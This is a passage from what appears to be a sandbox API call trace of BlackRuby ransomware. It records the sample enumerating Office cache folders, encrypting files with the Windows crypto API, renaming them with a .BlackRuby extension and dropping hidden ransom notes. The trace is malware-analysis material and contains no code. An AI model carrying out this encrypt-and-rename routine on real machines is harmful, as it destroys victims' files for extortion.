0x1 [0047.554] CloseHandle (hObject=0x184) returned 1 [0047.554] GetLastError () returned 0xb7 [0047.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.554] GetLastError () returned 0xb7 [0047.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_NasKfRaC00oP0qZXxorLrxkEcvfW4v1JVzTpT5W7bi.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_NasKfRaC00oP0qZXxorLrxkEcvfW4v1JVzTpT5W7bi.BlackRuby", lpFilePart=0x0) returned 0x7d [0047.554] GetLastError () returned 0xb7 [0047.554] SetErrorMode (uMode=0x1) returned 0x0 [0047.554] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x248cf1c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7ee0)) returned 1 [0047.554] GetLastError () returned 0xb7 [0047.554] SetErrorMode (uMode=0x0) returned 0x1 [0047.554] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_NasKfRaC00oP0qZXxorLrxkEcvfW4v1JVzTpT5W7bi.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\encrypted_naskfrac00op0qzxxorlrxkecvfw4v1jvztpt5w7bi.blackruby")) returned 1 [0047.555] GetLastError () returned 0xb7 [0047.555] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.555] GetLastError () returned 0xb7 [0047.555] SetErrorMode (uMode=0x1) returned 0x0 [0047.555] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.555] GetLastError () returned 0x5 [0047.556] SetErrorMode (uMode=0x0) returned 0x1 [0047.556] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.556] GetLastError () returned 0x5 [0047.557] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.557] GetLastError () returned 0x5 [0047.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.557] GetLastError () returned 0x5 [0047.557] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.557] GetLastError () returned 0x5 [0047.557] SetErrorMode (uMode=0x1) returned 0x0 [0047.557] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0047.564] GetLastError () returned 0x5 [0047.564] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.565] GetLastError () returned 0x5 [0047.565] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.565] GetLastError () returned 0x12 [0047.565] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0047.566] SetErrorMode (uMode=0x0) returned 0x1 [0047.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.566] GetLastError () returned 0x12 [0047.566] SetErrorMode (uMode=0x1) returned 0x0 [0047.566] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.567] GetLastError () returned 0x12 [0047.567] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.567] GetLastError () returned 0x12 [0047.567] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0047.568] SetErrorMode (uMode=0x0) returned 0x1 [0047.568] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.msi", lpFilePart=0x0) returned 0x4d [0047.568] GetLastError () returned 0x12 [0047.568] SetErrorMode (uMode=0x1) returned 0x0 [0047.568] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cc7c68 | out: lpFileInformation=0x1cc7c68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86aabe50, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x86aabe50, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0x8a1ac370, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x2e2a00)) returned 1 [0047.569] GetLastError () returned 0x12 [0047.569] SetErrorMode (uMode=0x0) returned 0x1 [0047.570] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.570] GetLastError () returned 0x12 [0047.570] SetErrorMode (uMode=0x1) returned 0x0 [0047.570] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.570] GetLastError () returned 0x0 [0047.570] GetFileType (hFile=0x184) returned 0x1 [0047.570] SetErrorMode (uMode=0x0) returned 0x1 [0047.570] GetFileType (hFile=0x184) returned 0x1 [0047.570] WriteFile (in: hFile=0x184, lpBuffer=0x1ce36d4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1ce36d4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0047.571] GetLastError () returned 0x0 [0047.571] CloseHandle (hObject=0x184) returned 1 [0047.571] GetLastError () returned 0x0 [0047.571] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.571] GetLastError () returned 0x0 [0047.571] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.571] GetLastError () returned 0x0 [0047.571] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.571] GetLastError () returned 0x0 [0047.571] SetErrorMode (uMode=0x1) returned 0x0 [0047.571] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce53e0 | out: lpFileInformation=0x1ce53e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x875fb670, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x875fb670, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0x8a139780, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.572] GetLastError () returned 0x0 [0047.572] SetErrorMode (uMode=0x0) returned 0x1 [0047.572] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.572] GetLastError () returned 0x0 [0047.572] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.572] GetLastError () returned 0x0 [0047.572] SetErrorMode (uMode=0x1) returned 0x0 [0047.572] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.572] GetLastError () returned 0x0 [0047.572] GetFileType (hFile=0x184) returned 0x1 [0047.572] SetErrorMode (uMode=0x0) returned 0x1 [0047.572] GetFileType (hFile=0x184) returned 0x1 [0047.572] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x124d [0047.572] GetLastError () returned 0x0 [0047.572] ReadFile (in: hFile=0x184, lpBuffer=0x1ce6fa4, nNumberOfBytesToRead=0x124d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce6fa4*, lpNumberOfBytesRead=0x18ed84*=0x124d, lpOverlapped=0x0) returned 1 [0047.579] GetLastError () returned 0x0 [0047.579] CloseHandle (hObject=0x184) returned 1 [0047.579] GetLastError () returned 0x0 [0047.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.579] GetLastError () returned 0x0 [0047.579] SetErrorMode (uMode=0x1) returned 0x0 [0047.579] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x875fb670, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x875fb670, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0x8a139780, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.579] GetLastError () returned 0x0 [0047.579] SetErrorMode (uMode=0x0) returned 0x1 [0047.580] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0047.580] GetLastError () returned 0x0 [0047.612] CryptImportKey (in: hProv=0x37c790, pbData=0x1b4ea24, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0047.612] GetLastError () returned 0x0 [0047.612] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.612] GetLastError () returned 0x0 [0047.617] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b60) returned 1 [0047.617] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b7ba70*=0x1, dwFlags=0x0) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b7ba3c, dwFlags=0x0) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7bab8*, pdwDataLen=0x18ed74*=0x1340, dwBufLen=0x1340 | out: pbData=0x1b7bab8*, pdwDataLen=0x18ed74*=0x1340) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7e164*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b7e164*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7e194*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b7e194*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.617] GetLastError () returned 0x0 [0047.617] CryptDestroyKey (hKey=0x360f60) returned 1 [0047.617] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.617] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.617] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.617] GetLastError () returned 0x0 [0047.617] SetErrorMode (uMode=0x1) returned 0x0 [0047.617] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.618] GetLastError () returned 0xb7 [0047.618] GetFileType (hFile=0x184) returned 0x1 [0047.618] SetErrorMode (uMode=0x0) returned 0x1 [0047.618] GetFileType (hFile=0x184) returned 0x1 [0047.620] CloseHandle (hObject=0x184) returned 1 [0047.620] GetLastError () returned 0xb7 [0047.620] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.620] GetLastError () returned 0xb7 [0047.620] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_ARuYkVA2UlVjbkvI764bOtAqqKnVuHNDgPVlU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_ARuYkVA2UlVjbkvI764bOtAqqKnVuHNDgPVlU.BlackRuby", lpFilePart=0x0) returned 0x78 [0047.620] GetLastError () returned 0xb7 [0047.620] SetErrorMode (uMode=0x1) returned 0x0 [0047.620] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x875fb670, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x875fb670, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0x24967740, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1350)) returned 1 [0047.620] GetLastError () returned 0xb7 [0047.620] SetErrorMode (uMode=0x0) returned 0x1 [0047.620] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\office64ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_ARuYkVA2UlVjbkvI764bOtAqqKnVuHNDgPVlU.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\encrypted_aruykva2ulvjbkvi764botaqqknvuhndgpvlu.blackruby")) returned 1 [0047.620] GetLastError () returned 0xb7 [0047.621] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.621] GetLastError () returned 0xb7 [0047.621] SetErrorMode (uMode=0x1) returned 0x0 [0047.621] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.621] GetLastError () returned 0x5 [0047.622] SetErrorMode (uMode=0x0) returned 0x1 [0047.622] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0047.622] GetLastError () returned 0x5 [0047.622] SetErrorMode (uMode=0x1) returned 0x0 [0047.622] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\ose.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b9f090 | out: lpFileInformation=0x1b9f090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb076e820, ftCreationTime.dwHighDateTime=0x1cbe243, ftLastAccessTime.dwLowDateTime=0xb076e820, ftLastAccessTime.dwHighDateTime=0x1cbe243, ftLastWriteTime.dwLowDateTime=0x910341d0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x24768)) returned 1 [0047.622] GetLastError () returned 0x5 [0047.622] SetErrorMode (uMode=0x0) returned 0x1 [0047.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.623] GetLastError () returned 0x5 [0047.623] SetErrorMode (uMode=0x1) returned 0x0 [0047.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.623] GetLastError () returned 0x5 [0047.625] SetErrorMode (uMode=0x0) returned 0x1 [0047.625] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0047.625] GetLastError () returned 0x5 [0047.625] SetErrorMode (uMode=0x1) returned 0x0 [0047.625] GetFileAttributesExW (in: 